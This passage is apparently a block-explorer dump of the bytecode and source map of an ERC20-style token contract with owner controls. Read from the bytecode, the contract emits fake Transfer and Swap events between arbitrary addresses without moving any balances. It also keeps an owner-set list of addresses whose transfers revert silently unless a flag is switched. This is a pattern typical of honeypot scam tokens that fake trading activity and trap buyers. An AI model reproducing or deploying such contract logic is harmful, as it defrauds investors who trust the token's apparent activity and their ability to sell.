19061172c565b60405180910390f35b6103c960048036038101906103c49190611771565b610c98565b005b6103e560048036038101906103e09190611a96565b610d02565b6040516103f29190611756565b60405180910390f35b610415600480360381019061041091906117fb565b610d89565b005b610431600480360381019061042c91906117fb565b610e0c565b60405161043e919061172c565b60405180910390f35b60606006805461045690611b05565b80601f016020809104026020016040519081016040528092919081815260200182805461048290611b05565b80156104cf5780601f106104a4576101008083540402835291602001916104cf565b820191906000526020600020905b8154815290600101906020018083116104b257829003601f168201915b5050505050905090565b6000806104e4610e62565b90506104f1818585610e6a565b600191505092915050565b6000600454905090565b600080610511610e62565b905061051e858285611033565b6105298585856110bf565b60019150509392505050565b60006012905090565b610546611435565b80600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610595610e62565b90506105b68185856105a78589610d02565b6105b19190611b65565b610e6a565b600191505092915050565b6105c9611435565b60005b82829050811015610669576000600260008585858181106105f0576105ef611b99565b5b905060200201602081019061060591906117fb565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061066190611bc8565b9150506105cc565b505050565b60005b848490508110156107d05784848281811061068f5761068e611b99565b5b90506020020160208101906106a491906117fb565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516107079493929190611c55565b60405180910390a384848281811061072257610721611b99565b5b905060200201602081019061073791906117fb565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516107b59190611756565b60405180910390a380806107c890611bc8565b915050610671565b505050505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60005b8686905081101561090e5784848281811061084257610841611b99565b5b905060200201602081019061085791906117fb565b73ffffffffffffffffffffffffffffffffffffffff168787838181106108805761087f611b99565b5b905060200201602081019061089591906117fb565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8585858181106108df576108de611b99565b5b905060200201356040516108f39190611756565b60405180910390a3808061090690611bc8565b915050610824565b50505050505050565b61091f611435565b61092960006114b3565b565b60005b84849050811015610a8e5784848281811061094c5761094b611b99565b5b905060200201602081019061096191906117fb565b73ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d8226000868660006040516109c59493929190611c9a565b60405180910390a3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16858583818110610a1957610a18611b99565b5b9050602002016020810190610a2e91906117fb565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610a739190611756565b60405180910390a38080610a8690611bc8565b91505061092e565b505050505050565b610a9e611435565b60005b82829050811015610b3e57600160026000858585818110610ac557610ac4611b99565b5b9050602002016020810190610ada91906117fb565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610b3690611bc8565b915050610aa1565b505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060078054610b7b90611b05565b80601f0160208091040260200160405190810160405280929190818152602001828054610ba790611b05565b8015610bf45780601f10610bc957610100808354040283529160200191610bf4565b820191906000526020600020905b815481529060010190602001808311610bd757829003601f168201915b5050505050905090565b600080610c09610e62565b90506000610c178286610d02565b905083811015610c5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c5390611d51565b60405180910390fd5b610c698286868403610e6a565b60019250505092915050565b600080610c80610e62565b9050610c8d8185856110bf565b600191505092915050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610cf59190611756565b60405180910390a3505050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610d91611435565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610e00576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610df790611de3565b60405180910390fd5b610e09816114b3565b50565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ed9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed090611e75565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610f48576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3f90611f07565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516110269190611756565b60405180910390a3505050565b600061103f8484610d02565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110b957818110156110ab576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110a290611f73565b60405180910390fd5b6110b88484848403610e6a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361112e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161112590612005565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361119d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161119490612097565b60405180910390fd5b6111a8838383611577565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561122f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161122690612129565b60405180910390fd5b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806112d05750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561132c5760011515600560009054906101000a900460ff1615151461132b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113229061216f565b60405180910390fd5b5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161141c9190611756565b60405180910390a361142f84848461157c565b50505050565b61143d610e62565b73ffffffffffffffffffffffffffffffffffffffff1661145b610b43565b73ffffffffffffffffffffffffffffffffffffffff16146114b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114a8906121db565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156115bb5780820151818401526020810190506115a0565b60008484015250505050565b6000601f19601f8301169050919050565b60006115e382611581565b6115ed818561158c565b93506115fd81856020860161159d565b611606816115c7565b840191505092915050565b6000602082019050818103600083015261162b81846115d8565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006116688261163d565b9050919050565b6116788161165d565b811461168357600080fd5b50565b6000813590506116958161166f565b92915050565b6000819050919050565b6116ae8161169b565b81146116b957600080fd5b50565b6000813590506116cb816116a5565b92915050565b600080604083850312156116e8576116e7611633565b5b60006116f685828601611686565b9250506020611707858286016116bc565b9150509250929050565b60008115159050919050565b61172681611711565b82525050565b6000602082019050611741600083018461171d565b92915050565b6117508161169b565b82525050565b600060208201905061176b6000830184611747565b92915050565b60008060006060848603121561178a57611789611633565b5b600061179886828701611686565b93505060206117a986828701611686565b92505060406117ba868287016116bc565b9150509250925092565b600060ff82169050919050565b6117da816117c4565b82525050565b60006020820190506117f560008301846117d1565b92915050565b60006020828403121561181157611810611633565b5b600061181f84828501611686565b91505092915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261184d5761184c611828565b5b8235905067ffffffffffffffff81111561186a5761186961182d565b5b60208301915083602082028301111561188657611885611832565b5b9250929050565b600080602083850312156118a4576118a3611633565b5b600083013567ffffffffffffffff8111156118c2576118c1611638565b5b6118ce85828601611837565b92509250509250929050565b6000806000806000608086880312156118f6576118f5611633565b5b600061190488828901611686565b955050602086013567ffffffffffffffff81111561192557611924611638565b5b61193188828901611837565b94509450506040611944888289016116bc565b9250506060611955888289016116bc565b9150509295509295909350565b60008083601f84011261197857611977611828565b5b8235905067ffffffffffffffff8111156119955761199461182d565b5b6020830191508360208202830111156119b1576119b0611832565b5b9250929050565b600080600080600080606087890312156119d5576119d4611633565b5b600087013567ffffffffffffffff8111156119f3576119f2611638565b5b6119ff89828a01611837565b9650965050602087013567ffffffffffffffff811115611a2257611a21611638565b5b611a2e89828a01611837565b9450945050604087013567ffffffffffffffff811115611a5157611a50611638565b5b611a5d89828a01611962565b92509250509295509295509295565b611a758161165d565b82525050565b6000602082019050611a906000830184611a6c565b92915050565b60008060408385031215611aad57611aac611633565b5b6000611abb85828601611686565b9250506020611acc85828601611686565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680611b1d57607f821691505b602082108103611b3057611b2f611ad6565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000611b708261169b565b9150611b7b8361169b565b9250828201905080821115611b9357611b92611b36565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b6000611bd38261169b565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611c0557611c04611b36565b5b600182019050919050565b6000819050919050565b6000819050919050565b6000611c3f611c3a611c3584611c10565b611c1a565b61169b565b9050919050565b611c4f81611c24565b82525050565b6000608082019050611c6a6000830187611747565b611c776020830186611c46565b611c846040830185611c46565b611c916060830184611747565b95945050505050565b6000608082019050611caf6000830187611c46565b611cbc6020830186611747565b611cc96040830185611747565b611cd66060830184611c46565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611d3b60258361158c565b9150611d4682611cdf565b604082019050919050565b60006020820190508181036000830152611d6a81611d2e565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611dcd60268361158c565b9150611dd882611d71565b604082019050919050565b60006020820190508181036000830152611dfc81611dc0565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611e5f60248361158c565b9150611e6a82611e03565b604082019050919050565b60006020820190508181036000830152611e8e81611e52565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611ef160228361158c565b9150611efc82611e95565b604082019050919050565b60006020820190508181036000830152611f2081611ee4565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b6000611f5d601d8361158c565b9150611f6882611f27565b602082019050919050565b60006020820190508181036000830152611f8c81611f50565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611fef60258361158c565b9150611ffa82611f93565b604082019050919050565b6000602082019050818103600083015261201e81611fe2565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061208160238361158c565b915061208c82612025565b604082019050919050565b600060208201905081810360008301526120b081612074565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b600061211360268361158c565b915061211e826120b7565b604082019050919050565b6000602082019050818103600083015261214281612106565b9050919050565b50565b600061215960008361158c565b915061216482612149565b600082019050919050565b600060208201905081810360008301526121888161214c565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006121c560208361158c565b91506121d08261218f565b602082019050919050565b600060208201905081810360008301526121f4816121b8565b905091905056fea26469706673582212208557119bf6fd9fb846bf57f54406a1bcb1df60b4755f9aad0b946ed525b7b09b64736f6c63430008130033

Deployed Bytecode Sourcemap

82:166:2:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2206:98:4;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4482:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3293:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5241:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3143:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15148:104;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5922:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13843:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14521:307;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3457:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14286:229;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2459:101:3;;;:::i;:::-;;14834:308:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13642:195;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1836:85:3;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2417:102:4;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6643:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3778:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14163:117;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;4025:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2709:198:3;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14050:107:4;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2206:98;2260:13;2292:5;2285:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2206:98;:::o;4482:197::-;4565:4;4581:13;4597:12;:10;:12::i;:::-;4581:28;;4619:32;4628:5;4635:7;4644:6;4619:8;:32::i;:::-;4668:4;4661:11;;;4482:197;;;;:::o;3293:106::-;3354:7;3380:12;;3373:19;;3293:106;:::o;5241:286::-;5368:4;5384:15;5402:12;:10;:12::i;:::-;5384:30;;5424:38;5440:4;5446:7;5455:6;5424:15;:38::i;:::-;5472:27;5482:4;5488:2;5492:6;5472:9;:27::i;:::-;5516:4;5509:11;;;5241:286;;;;;:::o;3143:91::-;3201:5;3225:2;3218:9;;3143:91;:::o;15148:104::-;1729:13:3;:11;:13::i;:::-;15238:7:4::1;15221:14;;:24;;;;;;;;;;;;;;;;;;15148:104:::0;:::o;5922:234::-;6010:4;6026:13;6042:12;:10;:12::i;:::-;6026:28;;6064:64;6073:5;6080:7;6117:10;6089:25;6099:5;6106:7;6089:9;:25::i;:::-;:38;;;;:::i;:::-;6064:8;:64::i;:::-;6145:4;6138:11;;;5922:234;;;;:::o;13843:201::-;1729:13:3;:11;:13::i;:::-;13937:9:4::1;13932:106;13956:11;;:18;;13952:1;:22;13932:106;;;14022:5;13995:8;:24;14004:11;;14016:1;14004:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13995:24;;;;;;;;;;;;;;;;:32;;;;;;;;;;;;;;;;;;13976:3;;;;;:::i;:::-;;;;13932:106;;;;13843:201:::0;;:::o;14521:307::-;14638:9;14633:189;14657:11;;:18;;14653:1;:22;14633:189;;;14731:11;;14743:1;14731:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14701:45;;14706:6;14701:45;;;14714:3;14719:1;14722;14725:4;14701:45;;;;;;;;;:::i;:::-;;;;;;;;14790:11;;14802:1;14790:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14765:46;;14774:14;;;;;;;;;;;14765:46;;;14806:4;14765:46;;;;;;:::i;:::-;;;;;;;;14677:3;;;;;:::i;:::-;;;;14633:189;;;;14521:307;;;;;:::o;3457:125::-;3531:7;3557:9;:18;3567:7;3557:18;;;;;;;;;;;;;;;;3550:25;;3457:125;;;:::o;14286:229::-;14406:9;14401:108;14425:5;;:12;;14421:1;:16;14401:108;;;14482:3;;14486:1;14482:6;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14463:35;;14472:5;;14478:1;14472:8;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;14463:35;;;14490:4;;14495:1;14490:7;;;;;;;:::i;:::-;;;;;;;;14463:35;;;;;;:::i;:::-;;;;;;;;14439:3;;;;;:::i;:::-;;;;14401:108;;;;14286:229;;;;;;:::o;2459:101:3:-;1729:13;:11;:13::i;:::-;2523:30:::1;2550:1;2523:18;:30::i;:::-;2459:101::o:0;14834:308:4:-;14953:9;14948:188;14972:11;;:18;;14968:1;:22;14948:188;;;15046:11;;15058:1;15046:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;15016:45;;15021:6;15016:45;;;15029:1;15032:3;15037:4;15043:1;15016:45;;;;;;;;;:::i;:::-;;;;;;;;15105:14;;;;;;;;;;;15080:45;;15089:11;;15101:1;15089:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;15080:45;;;15121:3;15080:45;;;;;;:::i;:::-;;;;;;;;14992:3;;;;;:::i;:::-;;;;14948:188;;;;14834:308;;;;;:::o;13642:195::-;1729:13:3;:11;:13::i;:::-;13731:9:4::1;13726:105;13750:11;;:18;;13746:1;:22;13726:105;;;13816:4;13789:8;:24;13798:11;;13810:1;13798:14;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;13789:24;;;;;;;;;;;;;;;;:31;;;;;;;;;;;;;;;;;;13770:3;;;;;:::i;:::-;;;;13726:105;;;;13642:195:::0;;:::o;1836:85:3:-;1882:7;1908:6;;;;;;;;;;;1901:13;;1836:85;:::o;2417:102:4:-;2473:13;2505:7;2498:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;2417:102;:::o;6643:427::-;6736:4;6752:13;6768:12;:10;:12::i;:::-;6752:28;;6790:24;6817:25;6827:5;6834:7;6817:9;:25::i;:::-;6790:52;;6880:15;6860:16;:35;;6852:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6971:60;6980:5;6987:7;7015:15;6996:16;:34;6971:8;:60::i;:::-;7059:4;7052:11;;;;6643:427;;;;:::o;3778:189::-;3857:4;3873:13;3889:12;:10;:12::i;:::-;3873:28;;3911;3921:5;3928:2;3932:6;3911:9;:28::i;:::-;3956:4;3949:11;;;3778:189;;;;:::o;14163:117::-;14263:3;14247:26;;14256:5;14247:26;;;14268:4;14247:26;;;;;;:::i;:::-;;;;;;;;14163:117;;;:::o;4025:149::-;4114:7;4140:11;:18;4152:5;4140:18;;;;;;;;;;;;;;;:27;4159:7;4140:27;;;;;;;;;;;;;;;;4133:34;;4025:149;;;;:::o;2709:198:3:-;1729:13;:11;:13::i;:::-;2817:1:::1;2797:22;;:8;:22;;::::0;2789:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2872:28;2891:8;2872:18;:28::i;:::-;2709:198:::0;:::o;14050:107:4:-;14108:4;14131:8;:19;14140:9;14131:19;;;;;;;;;;;;;;;;;;;;;;;;;14124:26;;14050:107;;;:::o;589:96:3:-;642:7;668:10;661:17;;589:96;:::o;10973:370:4:-;11121:1;11104:19;;:5;:19;;;11096:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11201:1;11182:21;;:7;:21;;;11174:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11283:6;11253:11;:18;11265:5;11253:18;;;;;;;;;;;;;;;:27;11272:7;11253:27;;;;;;;;;;;;;;;:36;;;;11320:7;11304:32;;11313:5;11304:32;;;11329:6;11304:32;;;;;;:::i;:::-;;;;;;;;10973:370;;;:::o;11624:441::-;11754:24;11781:25;11791:5;11798:7;11781:9;:25::i;:::-;11754:52;;11840:17;11820:16;:37;11816:243;;11901:6;11881:16;:26;;11873:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11983:51;11992:5;11999:7;12027:6;12008:16;:25;11983:8;:51::i;:::-;11816:243;11744:321;11624:441;;;:::o;7524:900::-;7666:1;7650:18;;:4;:18;;;7642:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;7742:1;7728:16;;:2;:16;;;7720:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;7795:38;7816:4;7822:2;7826:6;7795:20;:38::i;:::-;7844:19;7866:9;:15;7876:4;7866:15;;;;;;;;;;;;;;;;7844:37;;7914:6;7899:11;:21;;7891:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;7977:8;:14;7986:4;7977:14;;;;;;;;;;;;;;;;;;;;;;;;;:30;;;;7995:8;:12;8004:2;7995:12;;;;;;;;;;;;;;;;;;;;;;;;;7977:30;7973:72;;;8036:4;8017:23;;:15;;;;;;;;;;;:23;;;8009:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;7973:72;8111:6;8097:11;:20;8079:9;:15;8089:4;8079:15;;;;;;;;;;;;;;;:38;;;;8311:6;8294:9;:13;8304:2;8294:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;8358:2;8343:26;;8352:4;8343:26;;;8362:6;8343:26;;;;;;:::i;:::-;;;;;;;;8380:37;8400:4;8406:2;8410:6;8380:19;:37::i;:::-;7632:792;7524:900;;;:::o;1994:130:3:-;2068:12;:10;:12::i;:::-;2057:23;;:7;:5;:7::i;:::-;:23;;;2049:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;1994:130::o;3061:187::-;3134:16;3153:6;;;;;;;;;;;3134:25;;3178:8;3169:6;;:17;;;;;;;;;;;;;;;;;;3232:8;3201:40;;3222:8;3201:40;;;;;;;;;;;;3124:124;3061:187;:::o;13359:121:4:-;;;;:::o;12653:120::-;;;;:::o;7:99:8:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:619::-;3875:6;3883;3891;3940:2;3928:9;3919:7;3915:23;3911:32;3908:119;;;3946:79;;:::i;:::-;3908:119;4066:1;4091:53;4136:7;4127:6;4116:9;4112:22;4091:53;:::i;:::-;4081:63;;4037:117;4193:2;4219:53;4264:7;4255:6;4244:9;4240:22;4219:53;:::i;:::-;4209:63;;4164:118;4321:2;4347:53;4392:7;4383:6;4372:9;4368:22;4347:53;:::i;:::-;4337:63;;4292:118;3798:619;;;;;:::o;4423:86::-;4458:7;4498:4;4491:5;4487:16;4476:27;;4423:86;;;:::o;4515:112::-;4598:22;4614:5;4598:22;:::i;:::-;4593:3;4586:35;4515:112;;:::o;4633:214::-;4722:4;4760:2;4749:9;4745:18;4737:26;;4773:67;4837:1;4826:9;4822:17;4813:6;4773:67;:::i;:::-;4633:214;;;;:::o;4853:329::-;4912:6;4961:2;4949:9;4940:7;4936:23;4932:32;4929:119;;;4967:79;;:::i;:::-;4929:119;5087:1;5112:53;5157:7;5148:6;5137:9;5133:22;5112:53;:::i;:::-;5102:63;;5058:117;4853:329;;;;:::o;5188:117::-;5297:1;5294;5287:12;5311:117;5420:1;5417;5410:12;5434:117;5543:1;5540;5533:12;5574:568;5647:8;5657:6;5707:3;5700:4;5692:6;5688:17;5684:27;5674:122;;5715:79;;:::i;:::-;5674:122;5828:6;5815:20;5805:30;;5858:18;5850:6;5847:30;5844:117;;;5880:79;;:::i;:::-;5844:117;5994:4;5986:6;5982:17;5970:29;;6048:3;6040:4;6032:6;6028:17;6018:8;6014:32;6011:41;6008:128;;;6055:79;;:::i;:::-;6008:128;5574:568;;;;;:::o;6148:559::-;6234:6;6242;6291:2;6279:9;6270:7;6266:23;6262:32;6259:119;;;6297:79;;:::i;:::-;6259:119;6445:1;6434:9;6430:17;6417:31;6475:18;6467:6;6464:30;6461:117;;;6497:79;;:::i;:::-;6461:117;6610:80;6682:7;6673:6;6662:9;6658:22;6610:80;:::i;:::-;6592:98;;;;6388:312;6148:559;;;;;:::o;6713:995::-;6826:6;6834;6842;6850;6858;6907:3;6895:9;6886:7;6882:23;6878:33;6875:120;;;6914:79;;:::i;:::-;6875:120;7034:1;7059:53;7104:7;7095:6;7084:9;7080:22;7059:53;:::i;:::-;7049:63;;7005:117;7189:2;7178:9;7174:18;7161:32;7220:18;7212:6;7209:30;7206:117;;;7242:79;;:::i;:::-;7206:117;7355:80;7427:7;7418:6;7407:9;7403:22;7355:80;:::i;:::-;7337:98;;;;7132:313;7484:2